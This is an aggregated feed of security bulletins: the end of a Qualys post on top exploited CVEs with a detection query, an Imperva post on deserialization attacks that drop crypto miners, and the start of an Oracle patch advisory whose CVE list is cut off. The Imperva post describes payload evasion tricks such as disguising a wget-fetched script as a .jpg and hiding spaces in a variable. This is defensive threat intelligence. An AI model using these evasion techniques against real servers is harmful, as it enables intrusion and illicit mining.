(Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking 
Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", 
"CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. 
Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. 
The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805 | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. 
A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | 
CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMQP | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Cognos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. 
Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. 
Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. 
The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. 
Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2020-10-04T21:16:00", "bulletinFamily": "software", "cvelist": ["CVE-2003-1418", "CVE-2013-0248", "CVE-2013-0255", "CVE-2013-1900", "CVE-2013-1902", "CVE-2013-1903", "CVE-2013-2566", 
"CVE-2014-0050", "CVE-2014-0060", "CVE-2014-0061", "CVE-2014-0062", "CVE-2014-0063", "CVE-2014-0064", "CVE-2014-0065", "CVE-2014-0066", "CVE-2014-0076", "CVE-2014-0107", "CVE-2014-0114", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3538", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3587", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-4342", "CVE-2014-4345", "CVE-2014-8275", "CVE-2014-8713", "CVE-2014-8714", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-0899", "CVE-2015-1787", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-2808", "CVE-2015-3193", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5351", "CVE-2015-7181", "CVE-2015-7182", "CVE-2015-7183", "CVE-2015-7501", "CVE-2015-7575", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-0701", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0763", "CVE-2016-10165", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1950", "CVE-2016-1979", "CVE-2016-2107", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-2834", "CVE-2016-3092", "CVE-2016-3506", "CVE-2016-5019", "CVE-2016-5285", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6515", "CVE-2016-6814", "CVE-2016-6816", "CVE-2016-7052", "CVE-2016-7055", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-8735", "CVE-2016-8745", "CVE-2016-9840", "CVE-2016-9841", "CVE-2016-9842", "CVE-2016-9843", "CVE-2017-10014", "CVE-2017-10026", "CVE-2017-10033", 
"CVE-2017-10034", "CVE-2017-10037", "CVE-2017-10050", "CVE-2017-10051", "CVE-2017-10054", "CVE-2017-10055", "CVE-2017-10060", "CVE-2017-10065", "CVE-2017-10066", "CVE-2017-10077", "CVE-2017-10099", "CVE-2017-10152", "CVE-2017-10153", "CVE-2017-10154", "CVE-2017-10155", "CVE-2017-10158", "CVE-2017-10159", "CVE-2017-10161", "CVE-2017-10162", "CVE-2017-10163", "CVE-2017-10164", "CVE-2017-10165", "CVE-2017-10166", "CVE-2017-10167", "CVE-2017-10190", "CVE-2017-10194", "CVE-2017-10197", "CVE-2017-10203", "CVE-2017-10227", "CVE-2017-10259", "CVE-2017-10260", "CVE-2017-10261", "CVE-2017-10263", "CVE-2017-10264", "CVE-2017-10265", "CVE-2017-10268", "CVE-2017-10270", "CVE-2017-10271", "CVE-2017-10274", "CVE-2017-10275", "CVE-2017-10276", "CVE-2017-10277", "CVE-2017-10279", "CVE-2017-10280", "CVE-2017-10281", "CVE-2017-10283", "CVE-2017-10284", "CVE-2017-10285", "CVE-2017-10286", "CVE-2017-10287", "CVE-2017-10292", "CVE-2017-10293", "CVE-2017-10294", "CVE-2017-10295", "CVE-2017-10296", "CVE-2017-10299", "CVE-2017-10300", "CVE-2017-10302", "CVE-2017-10303", "CVE-2017-10304", "CVE-2017-10306", "CVE-2017-10308", "CVE-2017-10309", "CVE-2017-10310", "CVE-2017-10311", "CVE-2017-10312", "CVE-2017-10313", "CVE-2017-10314", "CVE-2017-10315", "CVE-2017-10316", "CVE-2017-10317", "CVE-2017-10318", "CVE-2017-10319", "CVE-2017-10320", "CVE-2017-10321", "CVE-2017-10322", "CVE-2017-10323", "CVE-2017-10324", "CVE-2017-10325", "CVE-2017-10326", "CVE-2017-10327", "CVE-2017-10328", "CVE-2017-10329", "CVE-2017-10330", "CVE-2017-10331", "CVE-2017-10332", "CVE-2017-10333", "CVE-2017-10334", "CVE-2017-10335", "CVE-2017-10336", "CVE-2017-10337", "CVE-2017-10338", "CVE-2017-10339", "CVE-2017-10340", "CVE-2017-10341", "CVE-2017-10342", "CVE-2017-10343", "CVE-2017-10344", "CVE-2017-10345", "CVE-2017-10346", "CVE-2017-10347", "CVE-2017-10348", "CVE-2017-10349", "CVE-2017-10350", "CVE-2017-10351", "CVE-2017-10352", "CVE-2017-10353", "CVE-2017-10354", "CVE-2017-10355", "CVE-2017-10356", "CVE-2017-10357", 
"CVE-2017-10358", "CVE-2017-10359", "CVE-2017-10360", "CVE-2017-10361", "CVE-2017-10362", "CVE-2017-10363", "CVE-2017-10364", "CVE-2017-10365", "CVE-2017-10366", "CVE-2017-10367", "CVE-2017-10368", "CVE-2017-10369", "CVE-2017-10370", "CVE-2017-10372", "CVE-2017-10373", "CVE-2017-10375", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10380", "CVE-2017-10381", "CVE-2017-10382", "CVE-2017-10383", "CVE-2017-10384", "CVE-2017-10385", "CVE-2017-10386", "CVE-2017-10387", "CVE-2017-10388", "CVE-2017-10389", "CVE-2017-10391", "CVE-2017-10392", "CVE-2017-10393", "CVE-2017-10394", "CVE-2017-10395", "CVE-2017-10396", "CVE-2017-10397", "CVE-2017-10398", "CVE-2017-10399", "CVE-2017-10400", "CVE-2017-10401", "CVE-2017-10402", "CVE-2017-10403", "CVE-2017-10404", "CVE-2017-10405", "CVE-2017-10406", "CVE-2017-10407", "CVE-2017-10408", "CVE-2017-10409", "CVE-2017-10410", "CVE-2017-10411", "CVE-2017-10412", "CVE-2017-10413", "CVE-2017-10414", "CVE-2017-10415", "CVE-2017-10416", "CVE-2017-10417", "CVE-2017-10418", "CVE-2017-10419", "CVE-2017-10420", "CVE-2017-10421", "CVE-2017-10422", "CVE-2017-10423", "CVE-2017-10424", "CVE-2017-10425", "CVE-2017-10426", "CVE-2017-10427", "CVE-2017-10428", "CVE-2017-3167", "CVE-2017-3169", "CVE-2017-3444", "CVE-2017-3445", "CVE-2017-3446", "CVE-2017-3588", "CVE-2017-3730", "CVE-2017-3731", "CVE-2017-3732", "CVE-2017-3733", "CVE-2017-5461", "CVE-2017-5462", "CVE-2017-5662", "CVE-2017-5664", "CVE-2017-5706", "CVE-2017-5709", "CVE-2017-7502", "CVE-2017-7668", "CVE-2017-7679", "CVE-2017-9788", "CVE-2017-9805"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. 
Please refer to:\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 252 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=187793594395974id=2310031.1>).\n\nPlease note that on September 22, 2017, Oracle released Security Alert for CVE-2017-9805. Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced in this Security Alert as well as those contained in this Critical Patch update\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available here.\n", "modified": "2018-02-15T00:00:00", "published": "2017-10-17T00:00:00", "id": "ORACLE:CPUOCT2017", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2017-10324", "CVE-2017-10167", "CVE-2017-10014", "CVE-2017-10417", "CVE-2017-10037", "CVE-2015-5351", "CVE-2015-5254", "CVE-2017-10270", "CVE-2017-10387", "CVE-2017-10360", "CVE-2015-1792", "CVE-2017-10321", "CVE-2017-10060", "CVE-2015-0235", "CVE-2015-1793", "CVE-2017-10404", "CVE-2017-10311", "CVE-2017-10421", "CVE-2017-10353", "CVE-2017-10260", "CVE-2017-10203", "CVE-2016-9840", "CVE-2017-10419", "CVE-2017-10424", "CVE-2017-10399", "CVE-2017-10293", "CVE-2015-3197", "CVE-2017-10299", "CVE-2017-10158", "CVE-2017-10379", "CVE-2017-10414", "CVE-2017-10054", "CVE-2017-10357", "CVE-2017-10197", "CVE-2017-10361", "CVE-2017-10356", "CVE-2016-5019", "CVE-2017-10322", "CVE-2017-10323", "CVE-2017-10066", "CVE-2014-3572", "CVE-2017-5709", "CVE-2016-6306", "CVE-2017-5462", "CVE-2014-3613", "CVE-2017-7502", "CVE-2015-7181", "CVE-2015-0206", "CVE-2017-10369", "CVE-2015-1789", "CVE-2016-2183", "CVE-2017-10349", "CVE-2017-10284", "CVE-2017-10294", "CVE-2017-10325", "CVE-2017-10416", "CVE-2015-0286", "CVE-2017-10341", "CVE-2017-10420", "CVE-2017-10418", "CVE-2017-10367", "CVE-2016-2178", "CVE-2017-10164", "CVE-2013-1903", "CVE-2017-10400", "CVE-2017-3167", "CVE-2017-10281", "CVE-2015-3195", "CVE-2017-10351", "CVE-2017-10359", "CVE-2017-10381", "CVE-2017-10406", "CVE-2017-10348", "CVE-2017-10372", "CVE-2014-8714", "CVE-2017-10034", "CVE-2017-10328", "CVE-2016-0714", "CVE-2016-3092", "CVE-2014-3571", "CVE-2017-10397", "CVE-2017-10388", "CVE-2017-10330", "CVE-2017-10407", "CVE-2014-0076", "CVE-2017-10033", "CVE-2017-10342", "CVE-2017-10415", "CVE-2017-10408", "CVE-2016-6302", 
"CVE-2017-10344", "CVE-2017-10354", "CVE-2017-10338", "CVE-2017-10296", "CVE-2017-10292", "CVE-2017-10402", "CVE-2014-3587", "CVE-2017-10306", "CVE-2017-10365", "CVE-2017-10337", "CVE-2017-10426", "CVE-2016-8745", "CVE-2016-2177", "CVE-2017-10380", "CVE-2015-0288", "CVE-2017-10332", "CVE-2017-10378", "CVE-2014-0224", "CVE-2017-10026", "CVE-2017-10276", "CVE-2016-0635", "CVE-2017-10409", "CVE-2017-10166", "CVE-2017-10427", "CVE-2017-10422", "CVE-2015-3194", "CVE-2017-10355", "CVE-2017-10163", "CVE-2016-6515", "CVE-2017-10326", "CVE-2015-0285", "CVE-2016-2107", "CVE-2017-10153", "CVE-2016-7055", "CVE-2017-10382", "CVE-2015-7501", "CVE-2017-10364", "CVE-2017-10319", "CVE-2015-3253", "CVE-2017-3731", "CVE-2016-6307", "CVE-2016-0701", "CVE-2017-10398", "CVE-2017-10051", "CVE-2017-10308", "CVE-2017-10320", "CVE-2017-10287", "CVE-2017-10412", "CVE-2017-10334", "CVE-2016-9842", "CVE-2016-2834", "CVE-2017-10283", "CVE-2015-0899", "CVE-2017-10152", "CVE-2017-10264", "CVE-2016-1182", "CVE-2014-0065", "CVE-2016-0763", "CVE-2015-0207", "CVE-2017-10155", "CVE-2017-10271", "CVE-2017-10286", "CVE-2017-10304", "CVE-2016-6308", "CVE-2016-6816", "CVE-2016-7433", "CVE-2014-4342", "CVE-2017-5662", "CVE-2014-8275", "CVE-2016-2180", "CVE-2017-10411", "CVE-2017-10313", "CVE-2017-10194", "CVE-2015-7182", "CVE-2015-0208", "CVE-2015-2808", "CVE-2017-10347", "CVE-2014-3570", "CVE-2017-10227", "CVE-2015-7575", "CVE-2017-10370", "CVE-2017-10261", "CVE-2017-10425", "CVE-2017-5706", "CVE-2015-3196", "CVE-2017-10428", "CVE-2014-3470", "CVE-2017-10362", "CVE-2017-10309", "CVE-2016-2181", "CVE-2017-10391", "CVE-2016-6304", "CVE-2015-3193", "CVE-2017-10263", "CVE-2014-3538", "CVE-2017-10403", "CVE-2014-0114", "CVE-2017-10159", "CVE-2017-10410", "CVE-2017-3732", "CVE-2017-10383", "CVE-2017-10339", "CVE-2017-10340", "CVE-2014-0050", "CVE-2017-10327", "CVE-2017-10396", "CVE-2017-10300", "CVE-2014-3707", "CVE-2014-0064", "CVE-2017-10343", "CVE-2015-0293", "CVE-2017-10165", "CVE-2017-10316", 
